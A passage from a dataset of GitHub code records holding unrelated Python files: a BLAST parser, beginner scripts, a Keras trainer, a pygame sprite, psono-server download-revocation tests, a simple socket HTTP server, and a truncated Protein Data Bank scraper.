int(args[5])\n self.qstart = int(args[6])\n self.qstop = int(args[7])\n self.sstart = int(args[8])\n self.sstop = int(args[9])\n if len(args) > 10:\n self.evalue = float(args[10])\n self.score = float(args[11])\n\n self.orientation = \"+\"\n if self.qstart > self.qstop:\n self.qstart, self.qstop = self.qstop, self.qstart\n self.orientation = \"-\"\n if self.sstart > self.sstop:\n self.sstart, self.sstop = self.sstop, self.sstart\n self.orientation = \"-\"\n\n @property\n def has_score(self):\n return hasattr(self, \"score\")\n\n def __repr__(self):\n return \"BlastLine('%s' to '%s', eval=%.3f, score=%.1f)\" % (\n self.query,\n self.subject,\n self.evalue,\n self.score,\n )\n\n def __str__(self):\n if self.has_score:\n args = [getattr(self, attr) for attr in BlastLine.__slots__[:12]]\n else:\n args = [getattr(self, attr) for attr in BlastLine.__slots__[:10]]\n if self.orientation == \"-\":\n args[8], args[9] = args[9], args[8]\n return \"\\t\".join(str(x) for x in args)\n\n @property\n def swapped(self):\n \"\"\"\n Swap query and subject.\n \"\"\"\n args = [getattr(self, attr) for attr in BlastLine.__slots__[:12]]\n args[0:2] = [self.subject, self.query]\n args[6:10] = [self.sstart, self.sstop, self.qstart, self.qstop]\n if self.orientation == \"-\":\n args[8], args[9] = args[9], args[8]\n b = \"\\t\".join(str(x) for x in args)\n return BlastLine(b)\n\n @property\n def bedline(self):\n return \"\\t\".join(\n str(x)\n for x in (\n self.subject,\n self.sstart - 1,\n self.sstop,\n self.query,\n self.score,\n self.orientation,\n )\n )\n","repo_name":"tanghaibao/jcvi","sub_path":"jcvi/formats/pyblast.py","file_name":"pyblast.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":634,"dataset":"github-code","pt":"78"} +{"seq_id":"24874297478","text":"#Daniel Nocon\r\n#Project 2\r\n#Problem 3. (Playing Card ) Write a program called card.py that simulates the selection of a random card from a standard\r\n#deck of 52 playing cards, and writes it to standard output.\r\n\r\nimport stdio\r\nimport stdrandom #importing to imitate pulling a random card\r\n\r\n#assigning variables for card and suit\r\nrank = stdrandom.uniformInt(2,15) #assigns the value of the card\r\nsuit = stdrandom.uniformInt(1,5) #assigns the suit of the card\r\n\r\n#control flow if statement to convert value of card to string\r\nif rank == 2:\r\n rankStr = \"2\"\r\nelif rank == 3:\r\n rankStr = \"3\"\r\nelif rank == 4:\r\n rankStr = \"4\"\r\nelif rank == 5:\r\n rankStr = \"5\"\r\nelif rank == 6:\r\n rankStr = \"6\"\r\nelif rank == 7:\r\n rankStr = \"7\"\r\nelif rank == 8:\r\n rankStr = \"8\"\r\nelif rank == 9:\r\n rankStr = \"9\"\r\nelif rank == 10:\r\n rankStr = \"10\"\r\nelif rank == 11:\r\n rankStr = \"Jack\"\r\nelif rank == 12:\r\n rankStr = \"Queen\"\r\nelif rank == 13:\r\n rankStr = \"King\"\r\nelse:\r\n rankStr = \"Ace\"\r\n\r\n#control flow if statement to convert value to suit of card\r\nsuit = stdrandom.uniformInt(1,5)\r\nif suit == 1:\r\n suitStr = \"Clubs\"\r\nelif suit == 2:\r\n suitStr = \"Diamonds\"\r\nelif suit == 3:\r\n suitStr = \"Hearts\"\r\nelse:\r\n suitStr = \"Spades\"\r\n\r\n#prints the string conversion of rank and suit to a card from standard 52 card deck\r\nstdio.writeln(rankStr + \" of \" + suitStr)","repo_name":"skillipino/CS110","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4919180769","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom data_parser import load_data\n\ndef make_network():\n \"\"\"\n Create the neural network using Keras, returns an untrained network\n \"\"\"\n my_net = tf.keras.models.Sequential()\n\n my_net.add(tf.keras.layers.Dense(15, input_shape = (15,), activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(30, activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(50, activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(30, activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(15, activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(10, activation = None))\n my_net.add(tf.keras.layers.Flatten())\n\n my_net.add(tf.keras.layers.Dense(1, activation = 'sigmoid'))\n\n my_net.compile(loss = 'binary_crossentropy' , optimizer = 'adam' , metrics = ['accuracy'])\n return my_net\n\ndef analyze_data(model, X, y):\n \"\"\"\n args:\n model - Keras sequential model\n X - features numpy array (N_samples, N_features)\n y - labels (N_samples, 1)\n\n returns: \n trained model\n two plots:\n - Accuracy v. Epochs\n - Loss v. Epochs\n \"\"\"\n history = model.fit(X, y, epochs = 200, validation_split=0.4)\n # Plot training & validation accuracy values\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n # Plot training & validation loss values\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n return model\n\ndef __main__():\n \"\"\"\n Creates, trains, and saves a neural network using the stored data\n \"\"\"\n model = make_network()\n\n X, y = load_data(\"pres12.pkl\")\n Xp, yp = load_data(\"pres16.pkl\")\n X = np.concatenate((X, Xp), axis = 0)\n y = np.concatenate((y, yp), axis = 0)\n\n new_model = analyze_data(model, X, y)\n new_model.save('my_new_model.h5')","repo_name":"JaredMGoldman/ML-Final-Project","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32027696253","text":"import pygame\nfrom pygame.locals import *\nfrom random import choices, randint\n\nclass Sprite(pygame.sprite.Sprite):\n def __init__(self, screen, colour, width, height, entityKey):\n super().__init__()\n\n self.screen = screen\n self.colour = colour\n self.width = width\n self.height = height\n\n self.entityKey = entityKey\n\n def spawn(self, abs_x, abs_y, abs_origin_vect):\n self.abs_x = abs_x\n self.abs_y = abs_y\n\n x = abs_x + abs_origin_vect.x\n y = abs_y + abs_origin_vect.y\n\n self.rect = pygame.Rect(x, y, self.width, self.height)\n\n def draw(self):\n pygame.draw.rect(self.screen, self.colour, self.rect)\n\n def despawn(self):\n self.kill()\n del self.rect\n \n def moveto(self, x, y):\n self.rect.x = x\n self.rect.y = y\n \n\n#[Temp player sprite] =================================================================\nclass Player(Sprite):\n def __init__(self, screen, colour, width, height):\n super().__init__(screen, colour, width, height, \"player\")\n\n self.speed = 3\n self.sprint = False\n self.jittering = [1, 0]\n \n def moveLeft(self):\n self.rect.x -= self.speed\n self.moved = True\n\n def moveRight(self):\n self.rect.x += self.speed\n self.moved = True\n \n def moveUp(self):\n self.rect.y -= self.speed\n self.moved = True\n \n def moveDown(self):\n self.rect.y += self.speed\n self.moved = True\n\n def handle_movement(self, keys, fatigued):\n self.moved = False\n\n if choices((True, False), self.jittering[0 : 2], k = 1)[0]:\n if keys[K_SPACE] and not fatigued:\n self.speed = 8\n self.sprint = True\n else:\n self.speed = 3\n self.sprint = False\n\n\n if keys[K_LEFT]:\n self.moveLeft()\n if keys[K_RIGHT]:\n self.moveRight()\n if keys[K_UP]:\n self.moveUp()\n if keys[K_DOWN]:\n self.moveDown()\n else:\n randMovementChoice = randint(0, 4)\n\n maxJitterSpeed = self.jittering[2]\n if maxJitterSpeed >= 3:\n if fatigued or choices((True, False), (maxJitterSpeed, 2), k = 1)[0]:\n self.speed = 3\n self.sprint = False\n else:\n self.speed = maxJitterSpeed\n self.sprint = True\n else:\n self.speed = maxJitterSpeed\n\n\n if randMovementChoice == 1:\n self.moveLeft()\n if randMovementChoice == 2:\n self.moveRight()\n if randMovementChoice == 3:\n self.moveUp()\n if randMovementChoice == 4:\n self.moveDown()\n#======================================================================================","repo_name":"AndrewZ-0/MCS_simulator","sub_path":"sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18215560385","text":"from django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.auth.hashers import make_password\nfrom django.utils import timezone\nfrom datetime import timedelta\nfrom rest_framework import status\n\nfrom restapi import models\nfrom restapi.authentication import TokenAuthentication\nfrom restapi.renderers import encrypt\nfrom restapi.utils import encrypt_with_db_secret\n\nfrom restapi.tests.base import APITestCaseExtended\n\nimport binascii\nimport random\nimport string\nimport os\nimport json\nimport datetime\n\nimport nacl.encoding\nimport nacl.utils\nimport nacl.secret\nfrom nacl.public import PrivateKey\n\n\nclass RevokeDownloadTests(APITestCaseExtended):\n\n def setUp(self):\n\n self.test_email = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@example.com'\n self.test_email_bcrypt = 'a'\n self.test_username = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@psono.pw'\n self.test_authkey = binascii.hexlify(os.urandom(settings.AUTH_KEY_LENGTH_BYTES)).decode()\n self.test_public_key = binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode()\n self.test_private_key = binascii.hexlify(os.urandom(settings.USER_PRIVATE_KEY_LENGTH_BYTES)).decode()\n self.test_private_key_nonce = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_secret_key = binascii.hexlify(os.urandom(settings.USER_SECRET_KEY_LENGTH_BYTES)).decode()\n self.test_secret_key_nonce = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_user_sauce = 'd22f5797cfd438f212bb0830da488f0555487697ad4041bbcbf5b08bc297e117'\n self.test_user_obj = models.User.objects.create(\n email=self.test_email,\n email_bcrypt=self.test_email_bcrypt,\n username=self.test_username,\n authkey=make_password(self.test_authkey),\n public_key=self.test_public_key,\n private_key=self.test_private_key,\n private_key_nonce=self.test_private_key_nonce,\n secret_key=self.test_secret_key,\n secret_key_nonce=self.test_secret_key_nonce,\n user_sauce=self.test_user_sauce,\n is_email_active=True\n )\n\n self.test_email2 = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@example.com'\n self.test_email_bcrypt2 = \"b\"\n self.test_username2 = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@psono.pw'\n self.test_authkey2 = binascii.hexlify(os.urandom(settings.AUTH_KEY_LENGTH_BYTES)).decode()\n self.test_public_key2 = binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode()\n self.test_private_key2 = binascii.hexlify(os.urandom(settings.USER_PRIVATE_KEY_LENGTH_BYTES)).decode()\n self.test_private_key_nonce2 = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_secret_key2 = binascii.hexlify(os.urandom(settings.USER_SECRET_KEY_LENGTH_BYTES)).decode()\n self.test_secret_key_nonce2 = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_user_sauce2 = 'a67fef1ff29eb8f866feaccad336fc6311fa4c71bc183b14c8fceff7416add99'\n self.test_user_obj2 = models.User.objects.create(\n username=self.test_username2,\n email=encrypt_with_db_secret(self.test_email2),\n email_bcrypt=self.test_email_bcrypt2,\n authkey=make_password(self.test_authkey2),\n public_key=self.test_public_key2,\n private_key=self.test_private_key2,\n private_key_nonce=self.test_private_key_nonce2,\n secret_key=self.test_secret_key2,\n secret_key_nonce=self.test_secret_key_nonce2,\n user_sauce=self.test_user_sauce2,\n is_email_active=True\n )\n\n self.user_token = ''.join(random.choice(string.ascii_lowercase) for _ in range(64))\n self.user_db_token = models.Token.objects.create(\n key=TokenAuthentication.user_token_to_token_hash(self.user_token),\n user=self.test_user_obj,\n secret_key = binascii.hexlify(os.urandom(32)).decode(),\n valid_till=timezone.now() + timedelta(seconds=10),\n active=True,\n )\n # Create Fileserver\n box = PrivateKey.generate()\n self.cluster_private_key_hex = box.encode(encoder=nacl.encoding.HexEncoder).decode()\n self.cluster_public_key_hex = box.public_key.encode(encoder=nacl.encoding.HexEncoder).decode()\n\n private_key = encrypt_with_db_secret(self.cluster_private_key_hex)\n public_key = encrypt_with_db_secret(self.cluster_public_key_hex)\n\n self.cluster1 = models.Fileserver_Cluster.objects.create(\n title='Some Fileserver Cluster Title',\n auth_public_key=public_key,\n auth_private_key=private_key,\n file_size_limit=0,\n )\n\n self.shard1 = models.Fileserver_Shard.objects.create(\n title='Some Shard Title',\n description='Some Shard Description',\n )\n\n self.link1 = models.Fileserver_Cluster_Shard_Link.objects.create(\n cluster=self.cluster1,\n shard=self.shard1,\n read=True,\n write=True,\n )\n\n token_hash = TokenAuthentication.user_token_to_token_hash('abc')\n self.fileserver1 = models.Fileserver_Cluster_Members.objects.create(\n create_ip='127.0.0.1',\n fileserver_cluster=self.cluster1,\n key=token_hash,\n public_key=binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode(),\n secret_key=binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode(),\n url='https://fs01.example.com/fileserver',\n read=True,\n write=True,\n delete_capability=True,\n valid_till=timezone.now() + datetime.timedelta(seconds=30),\n )\n\n models.Fileserver_Cluster_Member_Shard_Link.objects.create(\n shard=self.shard1,\n member=self.fileserver1,\n read=True,\n write=True,\n delete_capability=True,\n ip_read_whitelist=json.dumps([]),\n ip_read_blacklist=json.dumps([]),\n ip_write_whitelist=json.dumps([]),\n ip_write_blacklist=json.dumps([]),\n )\n\n self.file_size = 140\n\n self.file = models.File.objects.create(\n shard=self.shard1,\n file_repository_id=None,\n chunk_count=1,\n size=self.file_size,\n user=self.test_user_obj,\n )\n\n self.file_transfer = models.File_Transfer.objects.create(\n user=self.test_user_obj,\n shard=self.shard1,\n file_repository_id=self.file.file_repository_id,\n file=self.file,\n size=self.file_size,\n size_transferred=self.file_size,\n chunk_count=1,\n chunk_count_transferred=1,\n credit=0,\n type='download',\n )\n\n self.hash_checksum = 'abc'\n self.file_chunk = models.File_Chunk.objects.create(\n user=self.test_user_obj,\n file=self.file,\n hash_checksum=self.hash_checksum,\n position=1,\n size=self.file_size,\n )\n\n\n def test_successful(self):\n \"\"\"\n Tests revoke download successful\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n chunk_size = self.file_size\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n refreshed_file_transfer = models.File_Transfer.objects.get(pk=self.file_transfer.id)\n\n self.assertEqual(self.file_transfer.size_transferred - chunk_size, refreshed_file_transfer.size_transferred)\n self.assertEqual(self.file_transfer.chunk_count_transferred - 1, refreshed_file_transfer.chunk_count_transferred)\n\n\n def test_failure_file_transfer_id_not_provided(self):\n \"\"\"\n Tests revoke download failure with file transfer id not being provided\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n # 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_file_transfer_id_invalid(self):\n \"\"\"\n Tests revoke download failure with a token that does not exist\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': 'abc',\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_token_decryption_error(self):\n \"\"\"\n Tests revoke download failure with token that cannot be decrypted\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n self.file_transfer.secret_key = binascii.hexlify(os.urandom(32)).decode()\n self.file_transfer.save()\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_hash_checksum_not_in_ticket(self):\n \"\"\"\n Tests revoke download failure with the hash checksum not being part of the ticket\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n # 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_file_transfer_id_not_exist(self):\n \"\"\"\n Tests revoke download failure with a not existing file transfer\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': '6e92cf15-f1ad-4047-a504-39ff2e2ef4f1',\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_file_transfer_not_being_a_download(self):\n \"\"\"\n Tests revoke download failure with the file transfer not having the type \"download\"\n \"\"\"\n\n self.file_transfer.type = 'upload'\n self.file_transfer.save()\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_fileserver_unauthenticated(self):\n \"\"\"\n Tests revoke download failure with the file server being unauthenticated\n \"\"\"\n\n models.Fileserver_Cluster_Member_Shard_Link.objects.all().delete()\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_chunk_hash_not_exists(self):\n \"\"\"\n Tests revoke download failure for a chunk (identified by its hash) that does not exist\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': 'abcdef',\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)","repo_name":"psono/psono-server","sub_path":"psono/fileserver/tests/revoke_download.py","file_name":"revoke_download.py","file_ext":"py","file_size_in_byte":15495,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"78"} +{"seq_id":"14666581446","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 25 10:53:42 2019\r\n\r\n@author: DHANUSH\r\n\"\"\"\r\n\r\nimport os,datetime, time, os.path,codecs,base64,webbrowser\r\nfrom socket import*\r\n\r\nserver='127.0.0.1'\r\nsport=8000\r\ndataLen=10000000\r\n#instructors hint\r\ndef getDate(filename):\r\n secs = os.path.getmtime(\"filename.html\") \r\n t = time.gmtime(secs)\r\n last_mod_time = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", t)\r\n return last_mod_time\r\n\r\n\r\n#mickey696 github\r\ndef getData(filename):\r\n Data=\"\"\r\n with open(filename,\"r\") as f:\r\n for line in f.readlines():\r\n if '

' in line:\r\n Data+=line\r\n Data=Data.replace('

', '')\r\n Data=Data.replace('

','')\r\n Data=Data.replace('<','<')\r\n Data=Data.replace('>','>')\r\n return Data\r\n \r\n \r\nserverSocket=socket(AF_INET, SOCK_STREAM)\r\n\r\nserverSocket.bind((server, sport))\r\n\r\n# Listen for incoming connection requests\r\n\r\n\r\n\r\nserverSocket.listen(1)\r\nprint('The server is ready to serve on port: ' + str(sport))\r\n\r\nwhile True:\r\n Lmdto=\"\"\r\n ResponseData=''\r\n connectionSocket, address = serverSocket.accept()\r\n \r\n \r\n RequestData = connectionSocket.recv(dataLen).decode()\r\n \r\n t = datetime.datetime.utcnow()\r\n RequestDateTime = t.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\r\n print(\"REQUEST MESSAGE RECIEVED\")\r\n print()\r\n \r\n print(RequestData)\r\n\r\n\r\n for item in RequestData.split():\r\n if item[0]==\"/\":\r\n filename=item[1:]\r\n break\r\n #stack overflow\r\n if not(os.path.isfile(filename)):\r\n \r\n notFound=\"HTTP/1.1 404 Not Found\" + \"\\r\\n\"+\"Date: \" + RequestDateTime + \"\\r\\n\"+\"\\r\\n\"\r\n connectionSocket.send(notFound.encode())\r\n\r\n \r\n \r\n else:\r\n \r\n LMDTC = getDate(filename)\r\n \r\n for lines in RequestData.splitlines():\r\n if \"If-Modified-Since\" in lines:\r\n Lmdto=lines[15:] \r\n \r\n if LMDTC in Lmdto:\r\n \r\n notModified=\"HTTP/1.1 304 Not Modified\\r\\n\"+\"Date: \" + RequestDateTime + \"\\r\\n\"+\"\\r\\n\"\r\n connectionSocket.send(notModified.encode())\r\n else:\r\n ContentData = getData(filename)\r\n ContentLength = str(len(ContentData))\r\n OK=\"HTTP/1.1 200 OK\" + \"\\r\\n\"+\"Date: \" + RequestDateTime + \"\\r\\n\"+\"Last-Modified: \" + LMDTC + \"\\r\\n\"+\"Content-Length: \" + ContentLength + \"\\r\\n\"+\"Content-Type: text/html; charset=UTF-8\" + \"\\r\\n\"+\"\\r\\n\" + ContentData\r\n connectionSocket.send(OK.encode())\r\n\r\n\r\n\r\n\r\n connectionSocket.close()\r\n","repo_name":"danyb12/computerNetworks","sub_path":"homework/Homework3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26956279542","text":"# # https://leetcode.com/problems/sign-of-the-product-of-an-array/\n\n# 1822. Sign of the Product of an Array\n# Easy\n# 2.1K\n# 205\n# Companies\n# There is a function signFunc(x) that returns:\n\n# 1 if x is positive.\n# -1 if x is negative.\n# 0 if x is equal to 0.\n# You are given an integer array nums. Let product be the product of all values in the array nums.\n\n# Return signFunc(product).\n\n \n\n# Example 1:\n\n# Input: nums = [-1,-2,-3,-4,3,2,1]\n# Output: 1\n# Explanation: The product of all values in the array is 144, and signFunc(144) = 1\n# Example 2:\n\n# Input: nums = [1,5,0,2,-3]\n# Output: 0\n# Explanation: The product of all values in the array is 0, and signFunc(0) = 0\n# Example 3:\n\n# Input: nums = [-1,1,-1,1,-1]\n# Output: -1\n# Explanation: The product of all values in the array is -1, and signFunc(-1) = -1\n\nfrom typing import List\ndef sign_of_product_an_array(nums: List[int]) -> int:\n ans=1\n for x in nums:\n if x == 0:\n return 0\n if x < 0:\n ans *= -1\n return ans\n\n\n\nif __name__ == \"__main__\":\n #nums = [-1,-2,-3,-4,3,2,1]\n nums = [-1,1,-1,1,-1]\n print (\"{}\".format(sign_of_product_an_array(nums)))\n","repo_name":"smohapatra1/scripting","sub_path":"python/practice/start_again/2023/11072023/sign_of_the_product_of_an_array.py","file_name":"sign_of_the_product_of_an_array.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70984471612","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 23 18:00:52 2020\r\n\r\n@author: Yunpeng Cheng\r\n\r\nE_mail: ycheng22@hotmail.com\r\n\r\nReference:\r\n\"\"\"\r\nimport time\r\ntic = time.time()\r\nfrom multiprocessing.dummy import Pool as ThreadPool\r\nfrom http.client import IncompleteRead\r\nimport sys\r\n#import sub_func #include read_url(), \r\nimport pypdb as pyb #this is a package as pdb API,https://github.com/williamgilpin/pypdb\r\nimport urllib.request\r\nimport pandas as pd\r\nimport numpy as np\r\nimport yagmail\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n#----------------------------------------------------------------------------\r\nopener = urllib.request.build_opener()\r\nopener.addheaders =[('User-agent', 'Mozilla/49.0.2')]\r\n#----------------------------------------------------------------------------\r\ndef read_url(id): #read one pdb's content\r\n url_beg='https://files.rcsb.org/view/'\r\n url_end='.pdb'\r\n url=url_beg+id+url_end\r\n fill_str=' '*20\r\n arr_store=np.full(17, fill_str)\r\n arr_store[0]=id \r\n try:\r\n try_open=opener.open(url)\r\n content = try_open.read().decode('utf-8')\r\n ct=content.split(\"\\n\")\r\n arr_store[1]=ct[0][10:49].rstrip() #header\r\n arr_store[2]=ct[0][50:59] #date\r\n for ln in ct: \r\n if (\"CRYST1\" in ln) & (\"REMARK\" not in ln): \r\n arr_store[3]=ln[6:15].lstrip() #a\r\n arr_store[4]=ln[15:24].lstrip() #b\r\n arr_store[5]=ln[24:33].lstrip() #c\r\n arr_store[6]=ln[33:40].lstrip() #alpha\r\n arr_store[7]=ln[40:47].lstrip() #beta\r\n arr_store[8]=ln[47:54].lstrip() #gamma\r\n arr_store[9]=ln[54:65].strip() #space group\r\n continue\r\n \r\n if (\"RESOLUTION RANGE HIGH (ANGSTROMS)\" in ln): #REMARK 3 RESOLUTION RANGE HIGH (ANGSTROMS) : 2.85 \r\n arr_store[10]=ln[49:55].rstrip() #reso high\r\n continue\r\n if (\"RESOLUTION RANGE LOW (ANGSTROMS)\" in ln): \r\n arr_store[11]=ln[49:55].rstrip() #reso low\r\n continue\r\n if (\"SOLVENT CONTENT\" in ln): \r\n arr_store[12]=ln[38:-20].rstrip() #solvent content\r\n continue\r\n if (\"COMPND\" in ln) & (\"CHAIN\" in ln):#in .pdb: COMPND 3 CHAIN: A; \r\n arr_store[13]=ln[18:-10].replace(';','').rstrip() #chain names\r\n continue\r\n if (\"PROTEIN ATOMS \" in ln): \r\n arr_store[14]=ln[40:-15].rstrip() #number of protein atoms\r\n continue\r\n if (\"FROM WILSON PLOT\" in ln): \r\n arr_store[15]=ln[49:-15].rstrip() #\r\n continue\r\n if (\"MEAN B VALUE\" in ln):\r\n arr_store[16]=ln[49:-15].rstrip() #\r\n continue \r\n except urllib.error.HTTPError:\r\n pass\r\n except urllib.error.URLError:\r\n pass\r\n except IncompleteRead:\r\n pass\r\n else:\r\n pass\r\n time.sleep(1) \r\n return arr_store\r\n#----------------------------------------------------------------------------\r\nall_ids=pyb.get_all()\r\nindex_beg=20000 #5000\r\nindex_end=20200 #10000\r\nid_store=all_ids[index_beg:index_end] \r\nlen_pick=len(id_store)\r\npara_arr=np.full((len_pick,18), ' '*20)\r\npool = ThreadPool(4)\r\n#results = pool.map(read_url, id_store)\r\nwriter = pd.ExcelWriter(\"pdb_info_\" + str(index_beg) + \"_\" + str(index_end-1) + \".xlsx\")\r\nindex=0\r\nfor ele in pool.imap(read_url, id_store):\r\n para_arr[index,0]=index+index_beg\r\n para_arr[index,1:]=ele \r\n sys.stdout.write(\"\\r scrapping %d / %d\" %(index+1, len_pick))\r\n sys.stdout.flush()\r\n index=index+1\r\n if (index % 100 == 0) | (index == 